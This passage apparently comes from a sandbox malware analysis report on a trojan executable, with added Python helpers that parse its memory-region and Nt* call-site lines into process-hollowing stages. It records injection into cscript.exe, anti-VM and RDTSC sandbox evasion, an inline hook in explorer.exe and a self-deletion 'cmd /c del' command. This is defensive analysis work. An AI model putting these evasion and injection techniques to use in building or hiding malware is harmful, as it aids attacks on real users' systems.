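    author = a["author"].strip() if a else "unknown"
    return pidx, base, prot, kind, label, author


def regions(lines):
    """One record per (process index, base address): rule labels, authors,
    dump types, and whether the region was dumped as RWX."""
    out = defaultdict(lambda: {"labels": set(), "authors": set(), "types": set(), "rwx": None})
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        pidx, base, prot, kind, label, author = rec
        r = out[(pidx, base)]
        r["labels"].add(label)
        r["authors"].add(author)
        r["types"].add(kind)
        if prot is not None:
            r["rwx"] = prot == PAGE_EXECUTE_READWRITE
    return dict(out)


def corroborated(lines):
    """Regions flagged by at least two independent rule authors, sorted."""
    return sorted(k for k, r in regions(lines).items() if len(r["authors"]) >= 2)


if __name__ == "__main__":
    for (pidx, base), r in sorted(regions(SAMPLE_LINES).items()):
        print(f"proc {pidx} @ 0x{base:08X} rwx={r['rwx']} authors={len(r['authors'])} {sorted(r['types'])}")
    print("corroborated:", [(p, hex(b)) for p, b in corroborated(SAMPLE_LINES)])
```

On the report's data this reduces 36 lines to eight regions; the two that matter most are process 5 at 0x400000 (the hollowed image, matched both in memory and as an unpacked PE) and the RWX regions in cscript.exe (process 9), while the 0x3BE9000 region in process 0 is a plain read/write buffer holding the payload before injection.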
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exe | Code function: 0_2_00867C03
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exe | Code function: 0_2_0086502D
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exe | Code function: 0_2_02A8C124
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exe | Code function: 0_2_02A8E562
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exe | Code function: 0_2_02A8E570
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exe | Code function: 0_2_00868831
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exe | Code function: 5_2_00401030
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exe | Code function: 5_2_0041E993
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exe | Code function: 5_2_00402D8A
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exe | Code function: 5_2_00402D90
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exe | Code function: 5_2_00409E30
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exe | Code function: 5_2_0041DFD0
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exe | Code function: 5_2_00402FB0
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exe | Code function: 5_2_00E9502D
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exe | Code function: 5_2_00E97C03
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exe | Code function: 5_2_00E98831
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_048CB090
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_048C841F
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_04971002
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_048CD5E0
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_048BF900
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_048B0D20
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_048D4120
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_04981D55
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_048D6E30
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_048EEBB0
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: String function: 048BB150 appears 32 times
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exe | Code function: 5_2_00419D50 NtCreateFile,
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exe | Code function: 5_2_00419E00 NtReadFile,
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exe | Code function: 5_2_00419E80 NtClose,
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exe | Code function: 5_2_00419F30 NtAllocateVirtualMemory,
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exe | Code function: 5_2_00419D4A NtCreateFile,
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exe | Code function: 5_2_00419E7C NtClose,
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exe | Code function: 5_2_00419F2A NtAllocateVirtualMemory,
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_048F9840 NtDelayExecution,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_048F9860 NtQuerySystemInformation,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_048F99A0 NtCreateSection,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_048F95D0 NtClose,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_048F9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_048F9540 NtReadFile,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_048F96D0 NtCreateKey,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_048F96E0 NtFreeVirtualMemory,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_048F9A50 NtCreateFile,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_048F9650 NtQueryValueKey,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_048F9660 NtAllocateVirtualMemory,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_048F9780 NtMapViewOfSection,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_048F9FE0 NtCreateMutant,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_048F9710 NtQueryInformationToken,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_048F98A0 NtWriteVirtualMemory,
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_048F98F0 NtReadVirtualMemory,
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_048F9820 NtEnumerateKey,
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_048FB040 NtSuspendThread,
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_048F99D0 NtCreateProcessEx,
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_048F95F0 NtQueryInformationFile,
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_048F9520 NtWaitForSingleObject,
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_048FAD30 NtSetContextThread,
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_048F9950 NtQueueApcThread,
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_048F9560 NtWriteFile,
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_048F9A80 NtOpenDirectoryObject,
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_048F9A00 NtProtectVirtualMemory,
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_048F9A10 NtQuerySection,
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_048F9610 NtEnumerateValueKey,
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_048F9A20 NtResumeThread,
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_048F9670 NtQueryInformationProcess,
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_048F97A0 NtUnmapViewOfSection,
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_048FA3B0 NtGetContextThread,
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_048F9B00 NtSetValueKey,
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_048FA710 NtOpenProcessToken,
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_048F9730 NtQueryVirtualMemory,
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_048F9760 NtOpenProcess,
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_048F9770 NtSetInformationFile,
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_048FA770 NtOpenThread,
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_02D69E80 NtClose,
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_02D69E00 NtReadFile,
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_02D69F30 NtAllocateVirtualMemory,
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_02D69D50 NtCreateFile,
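The cscript.exe call sites above contain, in a single process, every primitive that the report's signatures name separately: NtCreateProcessEx (a hollowing target), NtUnmapViewOfSection, NtAllocateVirtualMemory, NtWriteVirtualMemory, NtSetContextThread and NtQueueApcThread (thread-context and APC injection) and NtResumeThread. They also show the same Nt* stub reached at two unrelated addresses (NtCreateFile at 048F9A50 beside LdrInitializeThunk and again at 02D69D50), which, together with the wntdll.pdb string found in that process's 049AF000 region further down, is consistent with a second copy of ntdll being present in cscript.exe. The Python below is an added example, not report tooling: it reads these "Code function" lines, buckets the Nt* APIs into the stages of the hollowing chain and reports Nt* names that resolve in more than one 64 KiB region of the same process. The stage grouping and the 64 KiB granularity are analyst conventions (assumptions, not something the report states); the sample lines are copied from this report.

```python
"""Bucket sandbox 'Code function' Nt* call sites into process-hollowing stages.

Added example for reading a Joe Sandbox style report; not tooling from the report.
"""
import re
from collections import defaultdict

# "Code function: <procidx>_<phase>_<addr> Api1,Api2,"  (APIs only on some lines)
CODE_FN_RE = re.compile(
    r"Code function:\s+(?P<pidx>\d+)_(?P<phase>\d+)_(?P<addr>[0-9A-Fa-f]{8})\s+(?P<apis>(?:[A-Za-z]\w*,)+)"
)

# Stage names follow the report's signature wording; which API belongs to which
# stage is an analyst convention (ASSUMPTION), not something the report states.
STAGES = {
    "create target process": {"NtCreateProcessEx", "NtCreateProcess", "NtCreateUserProcess"},
    "unmap original image": {"NtUnmapViewOfSection"},
    "allocate or map in target": {"NtAllocateVirtualMemory", "NtMapViewOfSection", "NtCreateSection"},
    "write payload": {"NtWriteVirtualMemory"},
    "hijack thread": {"NtSetContextThread", "NtQueueApcThread"},
    "resume target": {"NtResumeThread"},
}

# Constructed sample: lines copied from the report above (process 5 = second
# z7d1ehQQQW.exe instance, process 9 = cscript.exe).
SAMPLE_LINES = [
    r"Source: C:\Users\user\Desktop\z7d1ehQQQW.exeCode function: 5_2_00419D50 NtCreateFile,",
    r"Source: C:\Users\user\Desktop\z7d1ehQQQW.exeCode function: 5_2_00419D4A NtCreateFile,",
    r"Source: C:\Users\user\Desktop\z7d1ehQQQW.exeCode function: 5_2_00419F30 NtAllocateVirtualMemory,",
    r"Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048F99D0 NtCreateProcessEx,",
    r"Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048F97A0 NtUnmapViewOfSection,",
    r"Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048F9660 NtAllocateVirtualMemory,LdrInitializeThunk,",
    r"Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048F98A0 NtWriteVirtualMemory,",
    r"Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048FAD30 NtSetContextThread,",
    r"Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048F9950 NtQueueApcThread,",
    r"Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048F9A20 NtResumeThread,",
    r"Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048F9A50 NtCreateFile,LdrInitializeThunk,",
    r"Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_02D69D50 NtCreateFile,",
    r"Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048CB090",
]


def call_sites(lines):
    """Yield (process_index, address, [api, ...]) for every line that lists APIs."""
    for line in lines:
        m = CODE_FN_RE.search(line)
        if not m:
            continue
        apis = [a for a in m["apis"].split(",") if a]
        yield int(m["pidx"]), int(m["addr"], 16), apis


def injection_primitives(lines):
    """Per process index: the hollowing stage each observed Nt* API falls into."""
    found = defaultdict(lambda: defaultdict(set))
    for pidx, _addr, apis in call_sites(lines):
        for api in apis:
            for stage, members in STAGES.items():
                if api in members:
                    found[pidx][stage].add(api)
    return {p: dict(s) for p, s in found.items()}


def hollowing_complete(stages):
    """True when every stage of the create/unmap/allocate/write/hijack/resume chain is present."""
    return all(stage in stages for stage in STAGES)


def duplicate_stubs(lines, region_shift=16):
    """Per process: Nt* names whose call sites fall in more than one 64 KiB region.
    Sites a few bytes apart (00419D50 / 00419D4A) are one stub entered at different
    offsets and count once; two distant regions for the same stub suggest two
    copies of the syscall stubs in the process."""
    regions = defaultdict(lambda: defaultdict(set))
    for pidx, addr, apis in call_sites(lines):
        for api in apis:
            if api.startswith("Nt"):
                regions[pidx][api].add(addr >> region_shift)
    return {p: {api: len(r) for api, r in m.items() if len(r) > 1} for p, m in regions.items()}


if __name__ == "__main__":
    prim = injection_primitives(SAMPLE_LINES)
    for pidx, stages in sorted(prim.items()):
        print(f"process {pidx}: hollowing chain complete={hollowing_complete(stages)}")
        for stage, apis in stages.items():
            print(f"  {stage}: {sorted(apis)}")
    print("stubs seen in more than one region:", duplicate_stubs(SAMPLE_LINES))
```

Process 9 completes the chain; process 5 only shows NtAllocateVirtualMemory from this list, which matches the report's account of cscript.exe, not the first-stage loader, being the process that performs the injection.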
            Source: z7d1ehQQQW.exe, 00000000.00000002.681699947.0000000007280000.00000004.00020000.sdmp | Binary or memory string: OriginalFilenameCF_Secretaria.dll< vs z7d1ehQQQW.exe
            Source: z7d1ehQQQW.exe, 00000000.00000002.674788458.000000000090A000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameFileBasedResourceGrovel.exe6 vs z7d1ehQQQW.exe
            Source: z7d1ehQQQW.exe, 00000000.00000002.676276288.0000000002BE1000.00000004.00000001.sdmp | Binary or memory string: OriginalFilename vs z7d1ehQQQW.exe
            Source: z7d1ehQQQW.exe, 00000000.00000002.676276288.0000000002BE1000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameColladaLoader.dll4 vs z7d1ehQQQW.exe
            Source: z7d1ehQQQW.exe, 00000005.00000002.736099358.00000000019AF000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs z7d1ehQQQW.exe
            Source: z7d1ehQQQW.exe, 00000005.00000002.735136542.0000000000F3A000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameFileBasedResourceGrovel.exe6 vs z7d1ehQQQW.exe
            Source: z7d1ehQQQW.exe, 00000005.00000002.736665067.0000000003520000.00000040.00020000.sdmp | Binary or memory string: OriginalFilenamecscript.exe` vs z7d1ehQQQW.exe
            Source: z7d1ehQQQW.exe | Binary or memory string: OriginalFilenameFileBasedResourceGrovel.exe6 vs z7d1ehQQQW.exe
            Source: z7d1ehQQQW.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: z7d1ehQQQW.exe | Virustotal: Detection: 24%
            Source: z7d1ehQQQW.exe | ReversingLabs: Detection: 13%
            Source: z7d1ehQQQW.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: unknown | Process created: C:\Users\user\Desktop\z7d1ehQQQW.exe 'C:\Users\user\Desktop\z7d1ehQQQW.exe'
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exe | Process created: C:\Users\user\Desktop\z7d1ehQQQW.exe C:\Users\user\Desktop\z7d1ehQQQW.exe
            Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\cscript.exe C:\Windows\SysWOW64\cscript.exe
            Source: C:\Windows\SysWOW64\cscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\z7d1ehQQQW.exe'
            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exe | Process created: C:\Users\user\Desktop\z7d1ehQQQW.exe C:\Users\user\Desktop\z7d1ehQQQW.exe
            Source: C:\Windows\SysWOW64\cscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\z7d1ehQQQW.exe'
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\z7d1ehQQQW.exe.log
            Source: classification engine | Classification label: mal100.troj.evad.winEXE@7/1@3/2
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5072:120:WilError_01
            Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts (2 identical entries)
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
            Source: z7d1ehQQQW.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: z7d1ehQQQW.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
            Source: Binary string: cscript.pdbUGP source: z7d1ehQQQW.exe, 00000005.00000002.736665067.0000000003520000.00000040.00020000.sdmp
            Source: Binary string: wntdll.pdbUGP source: z7d1ehQQQW.exe, 00000005.00000002.736099358.00000000019AF000.00000040.00000001.sdmp, cscript.exe, 00000009.00000002.918389183.00000000049AF000.00000040.00000001.sdmp
            Source: Binary string: wntdll.pdb source: z7d1ehQQQW.exe, 00000005.00000002.736099358.00000000019AF000.00000040.00000001.sdmp, cscript.exe
            Source: Binary string: cscript.pdb source: z7d1ehQQQW.exe, 00000005.00000002.736665067.0000000003520000.00000040.00020000.sdmp

            Data Obfuscation:

            .NET source code contains potential unpacker
            Source: z7d1ehQQQW.exe, CalendarId/MainForm.cs | .Net Code: InitializeComponent System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exe | Code function: 0_2_00867C03 push es; ret
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exe | Code function: 5_2_004178AB pushfd ; ret
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exe | Code function: 5_2_0040E27F push edx; iretd
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exe | Code function: 5_2_00409BD5 push esp; iretd
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exe | Code function: 5_2_004175F8 push edx; iretd
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exe | Code function: 5_2_00419DA2 pushad ; retf
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exe | Code function: 5_2_0041660F push edx; iretd
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exe | Code function: 5_2_0041CEF2 push eax; ret
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exe | Code function: 5_2_0041CEFB push eax; ret
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exe | Code function: 5_2_0041CEA5 push eax; ret
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exe | Code function: 5_2_0041CF5C push eax; ret
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exe | Code function: 5_2_00E97C03 push es; ret
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_0490D0D1 push ecx; ret
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_02D5E27F push edx; iretd
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_02D59BD5 push esp; iretd
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_02D678AB pushfd ; ret
            Source: initial sample | Static PE information: section name: .text entropy: 7.61448564553

            Hooking and other Techniques for Hiding and Protection:

            Modifies the prolog of user mode functions (user mode inline hooks)
            Source: explorer.exe | User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x89 0x9E 0xEF
            Self deletion via cmd delete
            Source: C:\Windows\SysWOW64\cscript.exe | Process created: /c del 'C:\Users\user\Desktop\z7d1ehQQQW.exe' (2 identical entries)
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exe | Process information set: NOOPENFILEERRORBOX (39 identical entries)
            Source: C:\Windows\SysWOW64\cscript.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion:

            Yara detected AntiVM3
            Source: Yara match | File source: 0.2.z7d1ehQQQW.exe.2d13274.1.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000000.00000002.676276288.0000000002BE1000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: z7d1ehQQQW.exe PID: 984, type: MEMORYSTR
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
            Source: z7d1ehQQQW.exe, 00000000.00000002.676276288.0000000002BE1000.00000004.00000001.sdmp | Binary or memory string: SBIEDLL.DLL
            Source: z7d1ehQQQW.exe, 00000000.00000002.676276288.0000000002BE1000.00000004.00000001.sdmp | Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
            Tries to detect virtualization through RDTSC time measurements
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exe | RDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exe | RDTSC instruction interceptor: First address: 0000000000409B4E second address: 0000000000409B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\SysWOW64\cscript.exe | RDTSC instruction interceptor: First address: 0000000002D598E4 second address: 0000000002D598EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\SysWOW64\cscript.exe | RDTSC instruction interceptor: First address: 0000000002D59B4E second address: 0000000002D59B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exe TID: 3880 | Thread sleep time: -41295s >= -30000s
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exe TID: 1288 | Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\explorer.exe TID: 3980 | Thread sleep time: -46000s >= -30000s
            Source: C:\Windows\SysWOW64\cscript.exe TID: 6176 | Thread sleep time: -50000s >= -30000s
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exe | Code function: 5_2_00409A80 rdtsc
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exe | Thread delayed: delay time: 922337203685477
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exe | Process information queried: ProcessInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exe | Thread delayed: delay time: 41295
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exe | Thread delayed: delay time: 922337203685477
            Source: explorer.exe, 00000006.00000000.705078872.000000000FDAF000.00000004.00000001.sdmp | Binary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: z7d1ehQQQW.exe, 00000000.00000002.676276288.0000000002BE1000.00000004.00000001.sdmp | Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
            Source: explorer.exe, 00000006.00000000.689058385.000000000A60E000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
            Source: z7d1ehQQQW.exe, 00000000.00000002.676276288.0000000002BE1000.00000004.00000001.sdmp | Binary or memory string: vmware
            Source: explorer.exe, 00000006.00000000.699256456.0000000006650000.00000004.00000001.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: explorer.exe, 00000006.00000000.689058385.000000000A60E000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
            Source: explorer.exe, 00000006.00000000.764509665.0000000004710000.00000004.00000001.sdmp | Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
            Source: explorer.exe, 00000006.00000000.689219732.000000000A716000.00000004.00000001.sdmp | Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
            Source: z7d1ehQQQW.exe, 00000000.00000002.676276288.0000000002BE1000.00000004.00000001.sdmp | Binary or memory string: VMware SVGA II
            Source: explorer.exe, 00000006.00000000.689219732.000000000A716000.00000004.00000001.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
            Source: explorer.exe, 00000006.00000000.722338176.000000000FDD4000.00000004.00000001.sdmp | Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Mail
            Source: z7d1ehQQQW.exe, 00000000.00000002.676276288.0000000002BE1000.00000004.00000001.sdmp | Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exe | Code function: 5_2_00409A80 rdtsc
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeProcess token adjusted: Debug
            Source: C:\Windows\SysWOW64\cscript.exeProcess token adjusted: Debug
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048B9080 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04933884 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04933884 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048C849B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048F90AF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_048EF0BF mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_048EF0BF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_048EF0BF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_0494B8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_0494B8D0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_0494B8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_0494B8D0 mov eax, dword ptr fs:[00000030h]
